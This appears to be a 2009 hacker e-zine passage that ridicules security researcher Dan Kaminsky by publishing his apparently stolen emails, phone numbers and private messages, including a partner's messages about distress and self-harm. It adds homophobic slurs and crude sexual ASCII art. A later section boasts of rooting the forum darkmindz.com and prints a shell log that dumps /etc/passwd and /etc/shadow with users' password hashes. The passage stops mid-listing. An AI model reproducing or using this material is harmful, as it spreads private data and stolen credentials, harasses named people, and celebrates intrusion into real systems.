~~~~~~
/* Three big cheers for R Grant Leonard! Stick it to the bitch. Let it be
* known that this guy is a cool dude and deserves some favours! 
*
* Dan actually pissed off a lot of people with his scanning. What a fucking
* kiddie. Even someone from the Canadian government told him to take a hike.
* How bad do you have to be to piss off the Canadians? Christ.
*
* After Dan made a big stink about DNS in 2008 he and everyone else wanted
* to ride the wave of coverage, so they did a lot of scanning. I think there
* were four of them including Dan and Dragos Ruiu scanning heavily from
* some network Vixie let them on. Vixie got a lot of complaints and begged
* them to stop but they kind of ignored him at first. After a while Vixie
* realized that not only were all four scanning hard, but they were often
* duplicating the same ranges. Then they were pretty much unwilling to
* work together and share data, even on Vixie's insistence. Basically they
* used and abused Vixie like a cheap Thai hooker.
*/

July 14 2008
Now if Matasano weren't so busy and would get around to finishing the 
report, we could be that much closer to letting them publish. But it's 
never quite as much of a hurry when it's waiting on yourself, is it? 
We're well past 30 days now. ;)

                                        Ryan
~~~~~~~~~~

No problem, Dan.  I will cease and desist immediately.
^ Paul Scheml on Dan asking him to censor FD

~~~~~~~~~~~


i told woot both of my slides but i said that the protections on slide two
were known to be inadequate and said that you had been able to break in.  i
suspect that this will be true when you get around to it, but i had to drive
home the "this isn't an alternative to udp port randomization, which you all
still have to do."  so if anyone asks, say yes, you're able to write my cache.

Vixie, Jul 28


                 !~~~~~~~~~~~~~~~ Gmail ~~~~~~~~~~~~~~~~!

// Here are some token mails from Dan's gmail inbox

From: "Dan Kaminsky" <effugas@gmail.com>
To: paul@vix.com
Subject: Compression Attacks
MIME-Version: 1.0
Content-Type: multipart/alternative; 
        boundary="----=_Part_23349_11600932.1140569240572"
Delivered-To: effugas@gmail.com

------=_Part_23349_11600932.1140569240572
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Heh Paul--

   You can talk to me here.  Cuttlefish -- awesome!  My # is 408-933-8195.
Call me anytime.

   Question:  Do you have a collection of DNS compression attacks?  There's
some critical stuff I'm testing that requires an extensive collection.

--Dan


Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hello,

  My sincerest apologies.  I received a very strange reaction when I arrived
at the Crazy Horse with nothing but the confirmation number; they refused to
accept my number but still knew precisely what I had ordered.  They forced
me to pay for the ticket onsite, somewhat embarassing me in front of my
client.  I will be returning to the states in a week; either you or the
Crazy Horse should refund your transactions before I return home.  If
neither of you do, I will be forced to enact a chargeback to ComeToParis.Com,
as yours is the ticket that was disrespected.  Clearly this does not benefit
any of us, so I hope within the next week a credit appears on my account.
Thank you, and I apologize for the hassle.

Yours Truly,

  Dan Kaminsky
  DoxPara Research
  http:///www.doxpara.com


On 1/6/07, Kevin Dunn <kev@ngssoftware.com> wrote:
>
>  Yup this is me - I'll call in a bit!
>
>
> ----- Original Message -----
> From: Dan Kaminsky <effugas@gmail.com>
> To: Kevin Dunn; Kevin Dunn
> Sent: Sat Jan 06 20:22:26 2007
> Subject: *ping*
>
> This your email?  Dring room 737 at the Riverbank Park Plaza, or dring
> +1-206-251-5605.
>
> --Dan


To: alishamd@hotmail.com
Subject: Pssst.
MIME-Version: 1.0
Content-Type: multipart/alternative; 
        boundary="----=_Part_33469_16586948.1168219906382"
Delivered-To: effugas@gmail.com

------=_Part_33469_16586948.1168219906382
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Well.  If it ain't the cute girl from Cafe Gaudy.

Cheers from London.  Its been an insane month -- but I'm finally coming back
to see old friends and, you know, sleep in my own bed thank you very much.
Reply, so I know you're actually listening on this address, and I'll finally
get to see you outside of that restaurant we keep bumping into eachother at.

--Dan


On 1/11/07, Conti, G. LTC EECS <Gregory.Conti@usma.edu> wrote:
>
> Dan,
>
> I just wanted to take a moment and thank you for
> your visit.  Both the faculty and cadets greatly
> enjoyed your talks.  You've done a great deal
> to inspire the next generation of Army leaders.
>
> All the best,
> Greg
>
> p.s. The information theory researcher I mentioned
> is Sergey Bratus at Dartmouth.  sergey@cs.dartmouth.edu
> He usually attends Defcon and I will make a point of
> introducing you.
>


                 !~~~~~~~~~~~~~~~ Twitter ~~~~~~~~~~~~~~!


/***** Kaminsky among us *****/


// those chat lines really hit you in the ass Dan
Mon May 18 17:14:36 +0000 2009 <ccg->dk> HOLY.. Last phone bill was $1200, Dan.
  I can't keep paying these. Please be somewhat responsible when this is 
  debiting my acct.

Sun Apr 26 23:42:49 +0000 2009 <dk->Beaker> you know, I wonder in what decade
  Sotirov will finally suck it up and read my slides

// Dan and Dino would make a nice couple
Mon Mar 23 19:46:54 +0000 2009 <rmogull> I like Dino a lot- he's just young.  I
  think if he got a serious job, with other good researchers, he'd  come a
Mon Mar 23 19:44:30 +0000 2009 <dan> deciding whether to try to extricate dino
  from the idiot squad. The rest are worthless to corporate but I think he's
  recoverable
Mon Mar 23 19:47:22 +0000 2009 <rmogull> It's funny- my first thought was,
  "he'll never do something like that after he hits 30"
Mon Mar 23 22:49:09 +0000 2009 <dan> this is fucked up shit. They're trying to
  recruit a fall kid. Holy fuck.
Mon Mar 23 22:57:44 +0000 2009 <rmogull> Who do you think is behind it?
Tue Mar 24 00:27:10 +0000 2009 <dan> alex just wants to see stuff burn. Charlie
  though, he semipublicly bitches about not getting this 100k payday...
Tue Mar 24 00:28:07 +0000 2009 <dan> from criminals, wanting instead ms to pay.
  I am seriously considering calling Charlie out
Tue Mar 24 00:29:55 +0000 2009 <dan> 'Don't incite kids just so you can feed
  your own. Either extort apple yourself or go away.' I know, bad idea
Tue Mar 24 22:12:44 +0000 2009 <dan> Never mind the rage, that was the effect
  of a mild concussion.  But, shit, it's true.  Charlie's trying to fuck some
  kid.
Tue Mar 24 22:32:45 +0000 2009 <rmogull> Concussion? WTF? I have a call with
  Dino soon, will investigate. I don't know Charlie well, just in passing. 
Tue Mar 24 22:33:09 +0000 2009 <rmogull> Wrote the forward to their book, but
  because of Dino.
Tue Mar 24 23:08:00 +0000 2009 <dan> snowboarding. Mild. Dino clearly doesn't
  know about the growing extortion epidemic, or consequences
Tue Mar 24 23:09:07 +0000 2009 <dan> dino is an old friend of mine; hanging
  with really career limiting crew.
Tue Mar 24 23:17:36 +0000 2009 <rmogull> I'm convinced he'll turn out okay... 
  with the right support
Tue Mar 24 23:26:15 +0000 2009 <dan> I dunno. The cool kids just got him to
  write the canonical screed inciting extortion. Is there time?
Tue Mar 24 23:36:23 +0000 2009 <rmogull> Just call me an optimist 
Tue Mar 24 23:37:45 +0000 2009 <rmogull> Oh- and don't fuck up your head. You
  don't have the looks for a modeling career.

// woo big head alert :)
Thu Mar 19 16:31:58 +0000 2009 <dk->ccg> o hai jeff moss, thanks for fucking
  me. http://snurl.com/e5d1o

// he learnt from the best
Thu Mar 05 20:06:20 +0000 2009 <dk->ccg> sotirov is such a dick. Good thing
  he's so bad at it

// my favourite back2back twitters
// epic diss and beyond epic FAIL
Thu Feb 19 22:40:54 +0000 2009 <dk->dragosr> sotirov has a real
  not-reading-the-goddamn-literature problem sometimes
Thu Feb 19 21:44:05 +0000 2009 <dk->ccg> attacker.doxpara.com root/ohhai it's
  his

// EMO TIME EMO TIME EMO TIME EMO TIME EMO TIME EMO TIME EMO TIME EMO TIME
// dan needs to learn to look after his woman
// that attempt at sucking up failed :/ Note to Dan, try flowers next time.
Wed Jan 28 21:16:55 +0000 2009 <ccg> girl just kind of generally hurts. It's
  not you. Just kind of a mess. Got DrupalCon ticket taken care of. Just 
  muddling through. 
Thu Jan 29 20:01:50 +0000 2009 <ccg> fuck you. You continue to have no regard
  for others. Unless they're others that are not me. Then they matter.
Thu Jan 29 20:09:46 +0000 2009 <dan> this is an overreaction. Is this how we
  have to interact?
Thu Jan 29 20:10:46 +0000 2009 <ccg> I am WORRIED about you, you asshole and
  you refuse to do anything about it. Again. Go and let yourself rot and 
  expect me to help.
Thu Jan 29 20:11:30 +0000 2009 <ccg> When I hit myself, it just makes some
  small bruises. You are ACTUALLY DOING DAMAGE to yourself. And I'm not 
  supposed to care??
Thu Jan 29 20:13:28 +0000 2009 <dan> did you really just make that comparison?
Thu Jan 29 20:14:06 +0000 2009 <ccg> Fuck you for not caring how much you hurt
  me or how much effort I put into helping you get well. Take and take and 
  take and take..
Thu Jan 29 20:18:19 +0000 2009 <dan> stop this. We'll talk when I get home.
Thu Jan 29 20:19:39 +0000 2009 <ccg> Take care of yourself and stop counting on
  me being willing to drop everything when you collapse b/c you just did what 
  you wanted
Thu Jan 29 20:26:46 +0000 2009 <dan> I love you. 
Thu Jan 29 20:31:46 +0000 2009 <ccg> Show it. Take care of yourself. Take care
  of me. Don't tell me I'm overreacting to watching you slowly kill yourself.
Thu Jan 29 20:43:18 +0000 2009 <ccg> I'm done. I'm drained. I've given
  everything I have. It's not coming back to me. I get no support. I'm just 
  empty and alone. 
Thu Jan 29 21:12:29 +0000 2009 <ccg> You just don't care how much I hurt enough
  to actually do anything different. Just leaves me empty and very very al one 
  here.
Thu Jan 29 22:38:02 +0000 2009 <ccg> I pretty desperately need help right now,
  and I have no idea where to start.

// why does Dan associate with the lamest
Fri Jan 16 06:19:32 +0000 2009 <dk->jeremiahg> Yeah.  I don't care about the
  noise from most people but I actually respect you.

// advice from the general of security media whoring.
// dk -> sotirov
Wed Dec 31 15:41:00 +0000 2008 <dan> well you have seen my md5 someday paper I
  assume
Wed Dec 31 19:17:32 +0000 2008 <alexsotirov> Of course, we cited your paper and
  it provided the inspiration for our title. So what do you have to say about 
  our PR strategy now?
Wed Dec 31 20:02:54 +0000 2008 <dan>  Actually, your PR was pretty bad.
  Tshirts?  I give you permission? Using the I broke the Internet domain was 
  also bad form. 
Wed Dec 31 20:04:30 +0000 2008 <dan>  Good PR works not just when things are
  going right, but when they're going wrong. Talk delivery was almost perfect
  though. 
Wed Dec 31 20:48:36 +0000 2008 <dan>  There's some ugliness. It's good to know
  you almost certainly had nothing to do with it. 
Sat Jan 03 06:17:16 +0000 2009 <ccg> Is OK. Go put out the fires :)
Sat Jan 03 07:13:25 +0000 2009 <dan> *sighs* you didn't know. alright, we'll
  talk voice in the next day or two. jeebuz fucking drama christ
Sun Jan 04 19:07:27 +0000 2009 <dan> j0.  sync up?
Sun Jan 04 19:15:29 +0000 2009 <dan> sounds good. embarassed as all hell that
  there's more drama.
Sun Jan 04 21:38:57 +0000 2009 <dan> We won't always agree -- different
  personalities and all that -- but I do respect immensely that we can disagree
  productively
Tue Jan 06 22:31:04 +0000 2009 <dan> advice: switch from attacking verisign for
  your disclosure to congratulating them for fixing quickly. The fight weakens
  you
Tue Jan 06 22:32:37 +0000 2009 <dan> ...while the congratulations has an edge
  of 'you didn't notice the 2007 work'. Not trying to be an ass, you're 
  wrestling a pig
Tue Jan 06 22:37:47 +0000 2009 <dan> switch too late and it'll parse as
  capitulation. Try to get it in early enough to represent magnamity
Wed Jan 07 21:44:32 +0000 2009 <alexsotirov> Tim Callan concedes defeat:
  http://tinyurl.com/8j3jcj Now I can start being magnanimous.
Wed Jan 07 23:39:52 +0000 2009 <dan> Cool.  Be genuine and congratulatory. 
  Look forward to a positive working relationship.  Respond to as little as
  possible.  Rebutt *nothing*

// the other side to Dan, note the dates
Tue Dec 30 00:31:27 +0000 2008 <dk->rmogull> enjoying a pwnie award judge
  showing the world *actual* media whoring. Very important: minimize bitching,
  controversy

// Can't believe these two are still friends
// shame dan didn't take heed of ptaceks warning
Wed Dec 31 00:58:20 +0000 2008 <dan> protecting you. Don't comment to press on
  the md5 game.
Wed Dec 31 01:00:17 +0000 2008 <tqbf> confused; what do i have to do with md5?
Wed Dec 31 01:00:45 +0000 2008 <tqbf> also, twitter dmsgs are insecure.
Wed Dec 31 01:01:54 +0000 2008 <dan> I'll tell you next year. You don't have to
  believe me...
Wed Dec 31 01:02:48 +0000 2008 <tqbf> oooookay, well thanks for the heads up; i
  think it's the sotirov & appelbaum show though.
Wed Dec 31 01:05:19 +0000 2008 <dan> nothing is as it seems. Run away. Tell
  nobody I said this to you.


// MDOWD, just because MDOWD!!! (zf0 wishes we could talk to Mark :( )
// dk -> mark
Fri Dec 12 01:45:26 +0000 2008 <mdowd> I dunno. Possibly continuing fallout :(
Fri Dec 12 04:18:05 +0000 2008 <mdowd>	They blogged for like a week and then
  killed the thing entirely. They had to kill the archives, with the event, I
  think :(
Fri Dec 12 04:26:42 +0000 2008 <mdowd>	If that theory is true, we should try
  to keep people quiet about the blog being gone... Press loves a controversy 


// sign him up to your faggotry
Sun Apr 19 15:56:55 +0000 2009 <adamcecc->dk> yeah nemo is an osx ninja

// whitehats interbreading shocker!
Mon Mar 30 17:36:12 +0000 2009 <rmogull> Hey- any chance your family is
  originally from Poland 2 generations ago and you have family in Connecticut?
Mon Mar 30 17:38:18 +0000 2009 <rmogull> Ok... my mom just told me her mom's
  maiden name was Kaminsky. Figured that would be just too friggen weird

## Hypocrisy
Mon Dec 29 21:37:55 +0000 2008 <adamjodonnell> what you did was different,
  there needed to be secrecy to coordinate a remediation effort. i think some
  people are doing it just to
Mon Dec 29 21:38:11 +0000 2008 <adamjodonnell> generate publicity for
  themselves.  we are researchers, not stage actors.


                 !~~~~~~~~~~~~~~~~ End ~~~~~~~~~~~~~~~~~!

So that's the story. Dan Kaminsky got owned. Everything. Blackhats have been
passing around his personal emails for months. He's only famous because his ego
is so bloated that he attacks the world with his pointless ramblings. Cut this
dog loose.


#############################################################
#                     THE ADVENTURES OF                     #
#                __                                         #
#     .--------.|__|.----.----.-----.                       #
#     |        ||  ||  __|   _|  _  |                       #
#     |__|__|__||__||____|__| |_____|                       #
#                                             __            #
#                         .-----.-----.-----.|__|.-----.    #
#                         |  _  |  -__|     ||  ||__ --|    #
#                         |   __|_____|__|__||__||_____|    #
#                         |__|                              #
#                                                           #
#############################################################
#         OMG ITS MY PENIS!!  #            ___  OMG PLEASE  #
#                  \  ___     #          ."   ". COMEBACK!!!#
#                    (o o) !  #     __  /(o) (o)\ /         #
#                  ! ( O )    #    /_)||   /     |          #
#                   .-. .-.   #    |_)||  '-     |          #
#                  /(  |  )\  #    \_)||   ___   /   |\/|_  #
#                  \(__|__)/  #     | / \ |___| /   _|  '/  #
#     Dan...       ' |   |`   #     |--\ '.___.'    \ ) /   #
#   is that you?     | | |    #     \   \_/\__/\__   |==|   #
#          \         | | |    #      \    \ /\ /\ `\ |  |   #
#_________8=D________'- -`____# No I'm never\//     \|  |   #
#/_/_/_/_/_/_/_/_/_/_/_/_/_/_/# coming back_________ |  |   #
#                             #        \/     '     \   /   #
#############################################################
# Please, at least tell       # I'll always love you        #
#   me why you left?! ___     #  Micro Penis (cry)  ___     #
#                   \(; ;)    #                  \ (; ;)    #
#                    ( o )    #                   \( o )    #
#                   .-. .-.   #                   .-. .-.   #
#                  /(  |  )\  #                  /(  |  )\  #
#  I actually      \(__|__)/  #                  \(__|__)/  #
#get laid without  ' |   |`   # You're such a    ' |   |`   #
# your gay ass.      | | |    #   faggot.          | | |    #
#        \           | | |    #        \           | | |    #
#_______8=D__________'- -`____#_______8=D__________'- -`____#
#/_/_/_/_/_/_/_/_/_/_/_/_/_/_/#/_/_/_/_/_/_/_/_/_/_/_/_/_/_/#
#                             #                             #
#############################################################
#                                                           #
#   Once Again Dan Kaminsky Is                              #
#                                             __            #
#              .-----.--.--.--.-----.-----.--|  |           #
#              |  _  |  |  |  |     |  -__|  _  |           #
#              |   __|________|__|__|_____|_____|           #
#              |__|                                         #
#                                              (c) zf0 2009 #
#############################################################



                                           |
                                       \       /            _\/_
    Hacking in gitmo                     .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
      A song by ZF0                                                 |

~ the sun aint shining no more
i aint seen daylight since 2004
they put me away for five to ten
boxed up in this dismal eight by eight pen

it's a quick trip to the bottom when you travel one way
lost all access, warez, hookups--gotta memorize 0day
heavy is the head that wore the crown
listen to the skinny on how it went down

what's a shell, you must be a hacker
fuck off before I smash your stack sir
people of the jury he's on the attack
profile of a son gone off the Wrong Track

only takes circumstantial evidence
plus one snitch and it all makes sense
antisocial history just will not impress
pointless details on which they obsess

given no box perms and the all-access ban
gotta route TCP through the night watchman
small window size--packets bounce off my cell wall
all because he won't ACK me at all

used to blast through defenses with Just force
root and rape and rm--no remorse
played the fool and built up notoriety ~



                                           |
                                       \       /            _\/_
     darkmindz                           .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
     We eat the night, we drink the time                            |
       Make our dreams come true
         And hungry eyes are passing by
           On streets we call the zoo

Darkmindz.com was just another "haxor" AKA idiot breeding ground forum run by
the infamous saudi named RoMeO. Fortunetly due to the recent events RoMeO
decided to kill his site and handle because he was sloppy & cocky enough to link
his anti-sec activities with his public internet "life". This has spared us the
trouble of needing to rm -rf /* his shit, so thx RoMeO, hope we can be friends.
We didn't want a good hax.log to go to waste so we decided to publish darkmindz
anyways.

RoMeO is a blackhat wannabe and gave us good lulz with astalavista, props to
that, but who the fuck is/was ssanz anyway and what's the point of spreading
anti-sec propaganda via imageshack? You can't enjoy the benefits of a blackhat
and run some retarded haxor forum at the same time pal, good to see that you
realized that. But in any case if you decide to put your shitty forum online
again, you will be rm'ed.

Here's what we found in darkmindz land.

root@www.darkmindz.com's password:
Last login: Sat May 23 03:39:06 2009 from cpe-76-175-20-182.socal.res.rr.com
ALERT! You are entering a secured area! Your IP and login information
have been recorded. System administration has been notified.
This system is restricted to authorized access only. All activities on
this system are recorded and logged. Unauthorized access will be fully
investigated and reported to the appropriate law enforcement agencies.

root@server2:~[root@server2 ~]# uname -a; id
Linux server2.hr-development.net 2.6.27.10-grsec #1 SMP Fri May 15 21:34:11 PDT
2009 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
root@server2:~[root@server2 ~]# #who up in this mother fucker
root@server2:~[root@server2 ~]# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
dovecot:x:104:104::/home/dovecot:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
hrdev:x:502:503::/home/hrdev:/bin/false
keytraderz:x:504:505::/home/keytraderz:/bin/false
yourkicks:x:507:508::/home/yourkicks:/bin/false
aaa:x:508:509::/home/aaa:/bin/false
beyond:x:509:510::/home/beyond:/bin/false
hotglow:x:510:511::/home/hotglow:/bin/false
wheelglow:x:512:513::/home/wheelglow:/bin/false
penguin:x:513:514::/home/penguin:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
furiogamin:x:516:517::/home/furiogamin:/bin/false
kaza:x:517:518::/home/kaza:/bin/false
pimpinjg:x:518:519::/home/pimpinjg:/bin/false
dakilla:x:521:522::/home/dakilla:/bin/false
bootroot:x:522:523::/home/bootroot:/bin/false
scraft758:x:525:526::/home/scraft758:/bin/false
hstrike:x:526:527::/home/hstrike:/bin/false
romeo:x:528:529::/home/romeo:/bin/false
xckx:x:529:530::/home/xckx:/bin/false
h3mod:x:530:531::/home/h3mod:/bin/false
clamav:x:533:534:Clam AntiVirus:/home/clamav:/bin/false
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:105:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
hbxmike:x:535:536::/home/hbxmike:/bin/false
wtfsmilez:x:536:537::/home/wtfsmilez:/bin/false
haiobr:x:537:538::/home/haiobr:/bin/false
odin:x:538:539::/home/odin:/bin/false
sam:x:539:540::/home/sam:/bin/false
mrgod:x:540:541::/home/mrgod:/bin/false
pagewiz:x:541:542::/home/pagewiz:/bin/false
zer0:x:542:543::/home/zer0:/bin/false
dablitz:x:543:544::/home/dablitz:/bin/false
ristop:x:544:545::/home/ristop:/bin/false
bloo:x:545:546::/home/bloo:/bin/false
root:$1$tilqrnIQ$fm2riVHK6dHchHIblFr/f1:14380:0:99999:7:::
bin:*:14253:0:99999:7:::
daemon:*:14253:0:99999:7:::
shutdown:*:14253:0:99999:7:::
halt:*:14253:0:99999:7:::
mail:*:14253:0:99999:7:::
ftp:*:14253:0:99999:7:::
nobody:*:14253:0:99999:7:::
dbus:!!:14253:0:99999:7:::
nscd:!!:14253:0:99999:7:::
vcsa:!!:14253:0:99999:7:::
rpc:!!:14253:0:99999:7:::
sshd:!!:14253:0:99999:7:::
pcap:!!:14253:0:99999:7:::
mailnull:!!:14253:0:99999:7:::
smmsp:!!:14253:0:99999:7:::
rpcuser:!!:14253:0:99999:7:::
nfsnobody:!!:14253:0:99999:7:::
rpm:!!:14253:0:99999:7:::
haldaemon:!!:14253:0:99999:7:::
named:!!:14257::::::
apache:!!:14257::::::
diradmin:!!:14256::::::
mysql:!!:14256::::::
webapps:!!:14256:0:99999:7:::
majordomo:!!:14256::::::
dovecot:!!:14256::::::
admin:$1$hOf0pEJ7$Csc3Cf1boad5jK8A4.gCe1:14379:0:99999:7:::
hrdev:$1$h66VePH.$Q18XKJHV0qQekrkx8DNPa.:14269:0:99999:7:::
keytraderz:$1$apmWxy/L$YuzBwBVn6o87A7gAqMUfj0:14369:0:99999:7:::
yourkicks:$1$IeMgb1QU$qNEVNIQDzjgW5Wt.V5cNs.:14269:0:99999:7:::
aaa:$1$Pvq5Ze1q$Nn1bNt8aTVT7VaBCZFuMr1:14269:0:99999:7:::
beyond:$1$gYlYPXOA$qMQTQ0gTMkqkeI3exuI5F0:14269:0:99999:7:::
hotglow:$1$UL8Osrrl$pKpDOHKiBcj2a5NBN1n1M1:14269:0:99999:7:::
wheelglow:$1$7CfmCRZb$TXXEzsFamBKkk7L10qKEn1:14269:0:99999:7:::
penguin:!$1$NKcb5Ati$z.YERAUu8ADbbo8XId6.e.:14269:0:99999:7:::
ntp:!!:14273::::::
furiogamin:$1$ehClK7ld$2OchIgSTZ1wnYgJnWJe1L/:14278:0:99999:7:::
kaza:$1$QU9IN8sS$cypmbg45B0V0k/a6knhzD0:14278:0:99999:7:::
pimpinjg:$1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1:14291:0:99999:7:::
dakilla:$1$Foh0gQdF$NDc4LO/3Otwxt.WXNGb8u1:14383:0:99999:7:::
bootroot:$1$YG4ZItt0$JYuixhSHo9KcJbdm4rumt.:14364:0:99999:7:::
scraft758:$1$BD72wrXX$3SarFSWt249OF71EugOvp1:14292:0:99999:7:::
hstrike:$1$roWSxdvs$X6QfaV/NhsXwqBCTFksL/0:14292:0:99999:7:::
romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
xckx:$1$NsnILOqK$3mGncK6wPMYMsb9vnkOyt/:14293:0:99999:7:::
h3mod:$1$XQo0rcc3$lmySsVMTrIC0ePWPXfOR2/:14293:0:99999:7:::
clamav:!!:14336:0:99999:7:::
avahi:!!:14336::::::
avahi-autoipd:!!:14336::::::
hbxmike:$1$PriF/4Bk$1.j6gBej9aPfrN4BJeDU11:14376:0:99999:7:::
wtfsmilez:$1$NJsG5rdb$X.EqYJhBhWhuAjteubXEK/:14365:0:99999:7:::
haiobr:$1$8WRmEqZ.$.shT4ddM9WHSteJ197DjE1:14385:0:99999:7:::
odin:$1$z5xA/a5f$x4VoN/NQhQshmAei3bZj4.:14379:0:99999:7:::
sam:$1$hQ9R7M26$pDBdZDh01EtAV1DxELrnc1:14376:0:99999:7:::
mrgod:$1$WmNO8283$hpvrrWLnd5Pp/RlcwYvnm/:14377:0:99999:7:::
pagewiz:$1$LgyU4TyH$kpQ.QEZ3mVv.nZQKvzrui0:14383:0:99999:7:::
zer0:$1$KMAddC48$OTyb50QllFSKp4AR4AcsC0:14385:0:99999:7:::
dablitz:$1$xUPbImWk$hDT9R4UAwbsQVyGxpZ.pu/:14386:0:99999:7:::
ristop:$1$9SfY3MtY$n8cHnCN6tY2WvhitNOykh.:14386:0:99999:7:::
bloo:$1$TtV5Q9IB$gi9SWdREB1ikky.Cgmiuu/:14387:0:99999:7:::
root@server2:~[root@server2 ~]# grep romeo /etc/shadow
romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
root@server2:~[root@server2 ~]# w
 04:05:41 up 18:48,  1 user,  load average: 0.34, 0.34, 0.23
USER	 TTY	  FROM		    LOGIN@   IDLE   JCPU   PCPU WHAT
root	 pts/0	  cpe-76-1x5-xx-xx 03:39   26:24   0.00s  0.00s -bash
root@server2:~[root@server2 ~]# ls -al
total 30488
drwxr-x--- 11 root    root	 4096 May 23 02:47 .
drwx--x--x 25 root    root	 4096 May 22 09:26 ..
-rw-------  1 root    root	 1132 Mar 11 01:44 anaconda-ks.cfg
-rw-r--r--  1 root    root	    0 May 20 17:26 authorized_keys2
-rwxr-xr-x  1 root    root	   10 May 23 03:02 .bash_history
-rw-r--r--  1 root    root	   24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root    root	  191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root    root	  176 Jan  6  2007 .bashrc
drwxrwxrwx 24	 1000	1000	 4096 Apr 28 14:55 clamav-0.95.1
-rw-r--r--  1 root    root   24260964 Apr  8 08:24 clamav-0.95.1.tar.gz
-rw-r--r--  1 root    root     171053 May 22 13:49 cleaned_shells_php.txt
drwxr-xr-x  4 root    root	 4096 Mar 18 00:50 .cpan
-rw-r--r--  1 root    root	  100 Jan  6  2007 .cshrc
-rw-r--r--  1 root    root	    4 Jan 12 16:21 .custombuild
-rwxr-xr-x  1 root    root	21171 Jan 13 14:13 da.cpanel.import.pl
-rw-r--r--  1 root    root	  288 Mar 31 05:21 defaults.conf
drwxr-xr-x  2 root    root	 4096 Mar 23 19:03 export
-rw-r--r--  1 root    root	 1155 May 15 22:15 f.c
drwxr-xr-x  3 root    root	 4096 May 12 20:35 forum
-rw-r--r--  1 root    root	  265 May 14 15:19 ifconfig
drwxr-xr-x  2 root    root	 4096 Mar 23 19:03 import
-rw-------  1 root    root	12288 Mar 27 04:26 .import.swp
-rw-r--r--  1 root    root	 1724 Apr  1 18:53 initsec
-rw-------  1 root    root	   97 May 23 04:02 .lesshst
-rw-r--r--  1 root    root	   27 May 23 02:35 load
-rw-------  1 root    root	   42 Feb  5 17:18 .my.cnf
-rw-------  1 root    root	   37 May  2 15:19 .mysql_history
-rw-r--r--  1 root    root	    9 Mar 31 05:21 .mytop
drwxr-xr-x 16 webapps apache	 4096 Apr 28 16:11 nmap-4.85BETA8
-rw-r--r--  1 root    root    6484436 Apr 21 14:38 nmap-4.85BETA8.tar.bz2
drwxr-xr-x  3 root    root	 4096 May 20 14:31 qurantine
-rw-------  1 root    root	 1024 Apr  2 18:01 .rnd
-rwxr-xr-x  1 root    root	 2024 Apr 28 14:44 scan.pl
drwx------  2 root    root	 4096 May 20 15:00 .ssh
-rw-r--r--  1 root    root	  129 Jan  6  2007 .tcshrc
-rw-------  1 root    root	12288 May 23 03:02 .test.swp
drwxr-xr-x  2 root    root	 4096 May 14 14:00 tmp
-rwxr-xr-x  1 root    root	47429 May 16  2008 tuning-primer.sh
root@server2:~[root@server2 ~]# cat .bash_history
exit
exit
root@server2:~[root@server2 ~]# #omg nmap, SECURE HOSTING
root@server2:~[root@server2 ~]# date
Sat May 23 04:06:57 PDT 2009
root@server2:~[root@server2 ~]# cd /home/romeo/
root@server2:/home/romeo[root@server2 romeo]# ls -al
total 44
drwx--x--x  6 romeo romeo 4096 Apr 22 15:51 .
drwx--x--x 36 root  root  4096 May 23 02:33 ..
drwx------  2 romeo romeo 4096 Feb 17 16:07 backups
-rw-r--r--  1 romeo romeo   33 Dec 22 09:57 .bash_logout
-rw-r--r--  1 romeo romeo  176 Dec 22 09:57 .bash_profile
-rw-r--r--  1 romeo romeo  124 Dec 22 09:57 .bashrc
-rw-------  1 romeo romeo    0 Feb  8 08:45 .clipboard.txt
drwx--x--x  4 romeo romeo 4096 Dec 23 14:31 domains
drwxrwx---  4 romeo mail  4096 Feb 17 16:07 imap
drwxrwx---  5 romeo mail  4096 Dec 23 08:29 Maildir
lrwxrwxrwx  1 romeo romeo   35 Feb 17 16:07 public_html ->
